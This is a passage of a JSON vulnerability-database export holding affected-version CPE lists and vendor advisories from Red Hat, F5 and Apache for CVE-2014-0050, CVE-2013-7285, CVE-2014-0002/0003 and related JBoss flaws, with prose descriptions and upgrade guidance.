"cpe:2.3:a:apache:tomcat:7.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:12.0in:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc10:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.4:*:*:*:*:*:*:*"]}], "redhat": [{"lastseen": "2019-05-29T14:34:45", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285", "CVE-2014-0002", "CVE-2014-0003"], "description": "Red Hat JBoss Fuse 6.0.0 is an integration platform based on Apache\nServiceMix. Red Hat JBoss A-MQ 6.0.0, based on Apache ActiveMQ, is a\nstandards compliant messaging system that is tailored for use in mission\ncritical applications.\n\nThis patch is an update to Red Hat JBoss Fuse 6.0.0 and Red Hat JBoss A-MQ\n6.0.0. It includes bug fixes, which are documented in the readme file\nincluded with the patch files.\n\nThe following security issues are fixed with this release:\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. A remote attacker able to submit messages to\na Camel route could use this flaw to perform arbitrary remote code\nexecution in the context of the Camel server process. (CVE-2014-0003)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. A remote attacker\nable to submit messages to an XSLT Camel route could use this flaw to read\nfiles accessible to the user running the application server and,\npotentially, perform other more advanced XML External Entity (XXE) attacks.\n(CVE-2014-0002)\n\nThe CVE-2014-0003 and CVE-2014-0002 issues were discovered by David Jorm of\nthe Red Hat Security Response Team.\n\nAll users of Red Hat JBoss Fuse 6.0.0 and Red Hat JBoss A-MQ 6.0.0 as\nprovided from the Red Hat Customer Portal are advised to apply this patch.", "modified": "2019-02-20T17:13:42", "published": "2014-03-24T21:55:48", "id": "RHSA-2014:0323", "href": "https://access.redhat.com/errata/RHSA-2014:0323", "type": "redhat", "title": "(RHSA-2014:0323) Important: Red Hat JBoss Fuse/A-MQ 6.0.0 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:12", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4286", "CVE-2014-0002", "CVE-2014-0003", "CVE-2014-0050"], "description": "Red Hat JBoss Fuse Service Works is the next-generation ESB and business\nprocess automation infrastructure. Red Hat JBoss Fuse Service Works allows\nIT to leverage existing (MoM and EAI), modern (SOA and BPM-Rules), and\nfuture (EDA and CEP) integration methodologies to dramatically improve\nbusiness process execution speed and quality.\n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss Fuse\nService Works 6.0.0. It includes various bug fixes, which are listed in the\nREADME file included with the patch files.\n\nThe following security issues are also fixed with this release:\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. A remote attacker able to submit messages to\na Camel route could use this flaw to perform arbitrary remote code\nexecution in the context of the Camel server process. (CVE-2014-0003)\n\nIt was found that when JBoss Web processed a series of HTTP requests in\nwhich at least one request contained either multiple content-length\nheaders, or one content-length header with a chunked transfer-encoding\nheader, JBoss Web would incorrectly handle the request. A remote attacker\ncould use this flaw to poison a web cache, perform cross-site scripting\n(XSS) attacks, or obtain sensitive information from other requests.\n(CVE-2013-4286)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. A remote attacker\nable to submit messages to an XSLT Camel route could use this flaw to read\nfiles accessible to the user running the application server and,\npotentially, perform other more advanced XML External Entity (XXE) attacks.\n(CVE-2014-0002)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. (CVE-2014-0050)\n\nThe CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of\nthe Red Hat Security Response Team.\n\nAll users of Red Hat JBoss Fuse Service Works 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this roll up patch.", "modified": "2019-02-20T17:14:43", "published": "2014-04-30T22:58:30", "id": "RHSA-2014:0459", "href": "https://access.redhat.com/errata/RHSA-2014:0459", "type": "redhat", "title": "(RHSA-2014:0459) Important: Red Hat JBoss Fuse Service Works 6.0.0 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:35:48", "bulletinFamily": "unix", "cvelist": ["CVE-2011-5245", "CVE-2012-0818", "CVE-2013-1624", "CVE-2013-6468", "CVE-2013-7285", "CVE-2014-0002", "CVE-2014-0003"], "description": "Red Hat JBoss BRMS is a business rules management system for the\nmanagement, storage, creation, modification, and deployment of JBoss Rules.\n\nThis release of Red Hat JBoss BRMS 6.0.1 serves as a replacement for Red\nHat JBoss BRMS 6.0.0, and includes bug fixes and enhancements. Refer to the\nRed Hat JBoss BRMS 6.0.1 Release Notes for information on the most\nsignificant of these changes. The Release Notes will be available shortly\nat https://access.redhat.com/site/documentation/en-US/Red_Hat_JBoss_BRMS/\n\nThe following security issues are fixed with this release:\n\nIt was discovered that JBoss BRMS allowed remote authenticated users to\nsubmit arbitrary Java code in MVFLEX Expression Language (MVEL) or JBoss\nRules expressions, resulting in arbitrary code execution within the\nsecurity context of the application server. Refer to the Solution section\nfor details on the fix for this issue. (CVE-2013-6468)\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. A remote attacker able to submit messages to\na Camel route could use this flaw to perform arbitrary remote code\nexecution in the context of the Camel server process. (CVE-2014-0003)\n\nIt was found that RESTEasy was vulnerable to XML External Entity (XXE)\nattacks. If a remote attacker submitted a request containing an external\nXML entity to a RESTEasy endpoint, the entity would be resolved, allowing\nthe attacker to read files accessible to the user running the application\nserver. This flaw affected DOM (Document Object Model) Document and JAXB\n(Java Architecture for XML Binding) input. (CVE-2011-5245, CVE-2012-0818)\n\nIt was discovered that bouncycastle leaked timing information when\ndecrypting TLS/SSL protocol encrypted records when CBC-mode cipher suites\nwere used. A remote attacker could possibly use this flaw to retrieve plain\ntext from the encrypted packets by using a TLS/SSL server as a padding\noracle. (CVE-2013-1624)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. A remote attacker\nable to submit messages to an XSLT Camel route could use this flaw to read\nfiles accessible to the user running the application server and,\npotentially, perform other more advanced XML External Entity (XXE) attacks.\n(CVE-2014-0002)\n\nThe CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of\nthe Red Hat Security Response Team, and the CVE-2013-6468 issue was\ndiscovered by Marc Schoenefeld of the Red Hat Security Response Team.\n\nRed Hat would like to thank Gr\u00e9gory Draperi for independently reporting\nCVE-2013-6468.\n\nAll users of Red Hat JBoss BRMS 6.0.0 as provided from the Red Hat Customer\nPortal are advised to upgrade to Red Hat JBoss BRMS 6.0.1.", "modified": "2019-02-20T17:14:01", "published": "2014-04-04T01:26:33", "id": "RHSA-2014:0372", "href": "https://access.redhat.com/errata/RHSA-2014:0372", "type": "redhat", "title": "(RHSA-2014:0372) Important: Red Hat JBoss BRMS 6.0.1 update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2011-5245", "CVE-2012-0818", "CVE-2013-1624", "CVE-2013-6468", "CVE-2013-7285", "CVE-2014-0002", "CVE-2014-0003"], "description": "Red Hat JBoss BPM Suite is a business rules management system for the\nmanagement, storage, creation, modification, and deployment of JBoss rules.\n\nThis release of Red Hat JBoss BPM Suite 6.0.1 serves as a replacement for\nRed Hat JBoss BPM Suite 6.0.0, and includes bug fixes and enhancements.\nRefer to the Red Hat JBoss BPM Suite 6.0.1 Release Notes for information on\nthe most significant of these changes. The Release Notes will be available\nat https://access.redhat.com/site/documentation/Red_Hat_JBoss_BPM_Suite/\n\nThe following security issues are fixed with this release:\n\nIt was discovered that JBoss BPM Suite allowed remote authenticated users\nto submit arbitrary Java code in MVFLEX Expression Language (MVEL) or JBoss\nRules expressions, resulting in arbitrary code execution within the\nsecurity context of the application server. Refer to the Solution section\nfor details on the fix for this issue. (CVE-2013-6468)\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. A remote attacker able to submit messages to\na Camel route could use this flaw to perform arbitrary remote code\nexecution in the context of the Camel server process. (CVE-2014-0003)\n\nIt was found that RESTEasy was vulnerable to XML External Entity (XXE)\nattacks. If a remote attacker submitted a request containing an external\nXML entity to a RESTEasy endpoint, the entity would be resolved, allowing\nthe attacker to read files accessible to the user running the application\nserver. This flaw affected DOM (Document Object Model) Document and JAXB\n(Java Architecture for XML Binding) input. (CVE-2011-5245, CVE-2012-0818)\n\nIt was discovered that bouncycastle leaked timing information when\ndecrypting TLS/SSL protocol encrypted records when CBC-mode cipher suites\nwere used. A remote attacker could possibly use this flaw to retrieve plain\ntext from the encrypted packets by using a TLS/SSL server as a padding\noracle. (CVE-2013-1624)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. A remote attacker\nable to submit messages to an XSLT Camel route could use this flaw to read\nfiles accessible to the user running the application server and,\npotentially, perform other more advanced XML External Entity (XXE) attacks.\n(CVE-2014-0002)\n\nThe CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of\nthe Red Hat Security Response Team, and the CVE-2013-6468 issue was\ndiscovered by Marc Schoenefeld of the Red Hat Security Response Team.\n\nRed Hat would like to thank Gr\u00e9gory Draperi for independently reporting\nCVE-2013-6468.\n\nAll users of Red Hat JBoss BPM Suite 6.0.0 as provided from the Red Hat\nCustomer Portal are advised to upgrade to Red Hat JBoss BPM Suite 6.0.1.", "modified": "2019-02-20T17:14:00", "published": "2014-04-04T01:08:23", "id": "RHSA-2014:0371", "href": "https://access.redhat.com/errata/RHSA-2014:0371", "type": "redhat", "title": "(RHSA-2014:0371) Important: Red Hat JBoss BPM Suite 6.0.1 update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "description": "XStream is a simple library to serialize and de-serialize objects to and\nfrom XML.\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nAll users of Red Hat JBoss Fuse Service Works 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this update.", "modified": "2019-02-20T17:13:18", "published": "2014-02-27T01:31:01", "id": "RHSA-2014:0216", "href": "https://access.redhat.com/errata/RHSA-2014:0216", "type": "redhat", "title": "(RHSA-2014:0216) Important: XStream security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "description": "The Red Hat Enterprise Virtualization reports package provides a suite of\npre-configured reports and dashboards that enable you to monitor the\nsystem. The reports module is based on JasperReports and JasperServer, and\ncan also be used to create ad-hoc reports.\n\nXStream is a simple library used by the Red Hat Enterprise Virtualization\nreports package to serialize and de-serialize objects to and from XML.\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nAll jasperreports-server-pro users are advised to upgrade to this updated\npackage, which contains a backported patch to correct this issue.\n", "modified": "2018-06-07T09:00:06", "published": "2014-04-09T04:00:00", "id": "RHSA-2014:0389", "href": "https://access.redhat.com/errata/RHSA-2014:0389", "type": "redhat", "title": "(RHSA-2014:0389) Important: jasperreports-server-pro security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:26", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "description": "XStream is a simple library to serialize and de-serialize objects to and\nfrom XML.\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nThe main distribution of Red Hat JBoss Data Virtualization 6.0.0 does not\ncontain the vulnerable XStream library and is not vulnerable to\nCVE-2013-7285. Only users of Red Hat JBoss Data Virtualization 6.0.0 who\ninstalled an optional S-RAMP distribution as provided from the Red Hat\nCustomer Portal are advised to apply this update.", "modified": "2019-02-20T17:13:39", "published": "2014-03-13T23:11:29", "id": "RHSA-2014:0294", "href": "https://access.redhat.com/errata/RHSA-2014:0294", "type": "redhat", "title": "(RHSA-2014:0294) Important: XStream security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:13", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4517", "CVE-2013-6440"], "description": "Red Hat JBoss Portal is the open source implementation of the Java EE suite\nof services and Portal services running atop Red Hat JBoss Enterprise\nApplication Platform.\n\nThis Red Hat JBoss Portal 6.1.1 release serves as a replacement for 6.1.0.\nRefer to the 6.1.1 Release Notes for further information, available shortly\nfrom https://access.redhat.com/site/documentation/en-US/\n\nIt was found that the ParserPool and Decrypter classes in the OpenSAML Java\nimplementation resolved external entities, permitting XML External Entity\n(XXE) attacks. A remote attacker could use this flaw to read files\naccessible to the user running the application server, and potentially\nperform other more advanced XXE attacks. (CVE-2013-6440)\n\nIt was discovered that the Apache Santuario XML Security for Java project\nallowed Document Type Definitions (DTDs) to be processed when applying\nTransforms even when secure validation was enabled. A remote attacker could\nuse this flaw to exhaust all available memory on the system, causing a\ndenial of service. (CVE-2013-4517)\n\nAll users of Red Hat JBoss Portal 6.1.0 as provided from the Red Hat\nCustomer Portal are advised to upgrade to Red Hat JBoss Portal 6.1.1.", "modified": "2019-02-20T17:12:57", "published": "2014-02-20T22:16:59", "id": "RHSA-2014:0195", "href": "https://access.redhat.com/errata/RHSA-2014:0195", "type": "redhat", "title": "(RHSA-2014:0195) Moderate: Red Hat JBoss Portal 6.1.1 update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T14:34:20", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. (CVE-2014-0050)\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 as\nprovided from the Red Hat Customer Portal are advised to apply this update.\nThe JBoss server process must be restarted for the update to take effect.", "modified": "2019-02-20T17:13:40", "published": "2014-03-05T23:50:05", "id": "RHSA-2014:0252", "href": "https://access.redhat.com/errata/RHSA-2014:0252", "type": "redhat", "title": "(RHSA-2014:0252) Moderate: Red Hat JBoss Enterprise Application Platform 6.2.1 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. (CVE-2014-0050)\n\nWarning: Before applying this update, back up your existing Red Hat JBoss\nEnterprise Application Platform installation and deployed applications.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 on Red Hat\nEnterprise Linux 5 and 6 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.\n", "modified": "2018-06-07T02:39:08", "published": "2014-03-05T05:00:00", "id": "RHSA-2014:0253", "href": "https://access.redhat.com/errata/RHSA-2014:0253", "type": "redhat", "title": "(RHSA-2014:0253) Moderate: Red Hat JBoss Enterprise Application Platform 6.2.1 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2019-07-02T20:43:47", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "\nF5 Product Development has assigned ID 452318 (BIG-IP) and ID 452803 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H455619 on the **Diagnostics **> **Identified **> **High **screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP AAM| 11.4.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP AFM| 11.3.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP Analytics| 11.0.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP APM| 11.0.0 - 11.5.4 \n10.1.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP ASM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nBIG-IP GTM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP Link Controller| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP PEM| 11.3.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| 11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None| Configuration utility \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| None\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the Configuration utility only over a secure network.\n\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2018-02-06T01:03:00", "published": "2014-04-19T00:53:00", "id": "F5:K15189", "href": "https://support.f5.com/csp/article/K15189", "title": "Apache Commons FileUpload vulnerability CVE-2014-0050", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-09-26T17:22:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the Configuration utility only over a secure network.\n\nSupplemental Information\n\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2016-08-16T00:00:00", "published": "2014-04-18T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15189.html", "id": "SOL15189", "title": "SOL15189 - Apache Commons FileUpload vulnerability CVE-2014-0050", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- - Commons FileUpload 1.0 to 1.3\r\n- - Apache Tomcat 8.0.0-RC1 to 8.0.1\r\n- - Apache Tomcat 7.0.0 to 7.0.50\r\n- - Apache Tomcat 6 and earlier are not affected\r\n\r\nApache Tomcat 7 and Apache Tomcat 8 use a packaged renamed copy of\r\nApache Commons FileUpload to implement the requirement of the Servlet\r\n3.0 and later specifications to support the processing of\r\nmime-multipart requests. Tomcat 7 and 8 are therefore affected by this\r\nissue. While Tomcat 6 uses Commons FileUpload as part of the Manager\r\napplication, access to that functionality is limited to authenticated\r\nadministrators.\r\n\r\nDescription:\r\nIt is possible to craft a malformed Content-Type header for a\r\nmultipart request that causes Apache Commons FileUpload to enter an\r\ninfinite loop. A malicious user could, therefore, craft a malformed\r\nrequest that triggered a denial of service.\r\nThis issue was reported responsibly to the Apache Software Foundation\r\nvia JPCERT but an error in addressing an e-mail led to the unintended\r\nearly disclosure of this issue[1].\r\n\r\nMitigation:\r\nUsers of affected versions should apply one of the following mitigations\r\n- - Upgrade to Apache Commons FileUpload 1.3.1 or later once released\r\n- - Upgrade to Apache Tomcat 8.0.2 or later once released\r\n- - Upgrade to Apache Tomcat 7.0.51 or later once released\r\n- - Apply the appropriate patch\r\n - Commons FileUpload: http://svn.apache.org/r1565143\r\n - Tomcat 8: http://svn.apache.org/r1565163\r\n - Tomcat 7: http://svn.apache.org/r1565169\r\n- - Limit the size of the Content-Type header to less than 4091 bytes\r\n\r\nCredit:\r\nThis issue was reported to the Apache Software Foundation via JPCERT.\r\n\r\nReferences:\r\n[1] http://markmail.org/message/kpfl7ax4el2owb3o\r\n[2] http://tomcat.apache.org/security-8.html\r\n[3] http://tomcat.apache.org/security-7.html\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\r\n\r\niQIcBAEBAgAGBQJS83P8AAoJEBDAHFovYFnnbOwP/0m80St7x63n6VCiR0aGuGLz\r\n/J004spHfbc+vtg2RumObBTX6mSfvPgO2R4FzE17Etg8QtWreoxb7kjnVXUwjdMX\r\nnb3Yt6IY1yBW1K+YcZRziOQXkRnnjnpC7Lh2o5eqpJ1S7wpXl5PBIXYSxMAsJCuv\r\naxFA0aq5cc17uDAH1z6DPk4149oZz2lHdlBUTTkCh/0PrvcIFxwpej75gUfyaV0y\r\nDGZLs3IpRYcJMS131q72DUt9wBsIqJN0mqUOq2svBS3mlXBcKDjy21b8QiEr8itK\r\nUqwsYUtOZP4nZ4u8j6euxF2fC/ivm/930OGOl9pn2SbkoHJKm/4rz2GYDA9jq07K\r\nXEDeGdTx3ZuDaTaBER8xquETRZ/Rb8dbBxQwzmo6doJNOjsMQFlR+1F+p56AhYd0\r\nklbT6Q7i/Ic3BdRJkUpaYshhtXeAOnH+0u9j4kRXMgJbkMgOacopomFX6HoXr9/i\r\nRHGbwwSZViLooR88Yg0FU2230+9mJLXxaJ6usHrtq4dS9ElSV320OCyisNjMX5hi\r\n5SFYMSy+z0nsK2O6yCzlukztoFhvaNecvy3I8w5EKytweyFlPzxXn6QpQjG+ffb5\r\nql7TZRrApiaewp4crzBcZSAjDzRNiQpcI2xTTN/H9u/yk8lrhOULi4pljKCudvmM\r\neIWblFdpoPVl0iqvsXA9\r\n=uzLf\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2014-03-31T00:00:00", "published": "2014-03-31T00:00:00", "id": "SECURITYVULNS:DOC:30435", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30435", "title": "[SECURITY] CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-2122", "CVE-2014-0050"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following 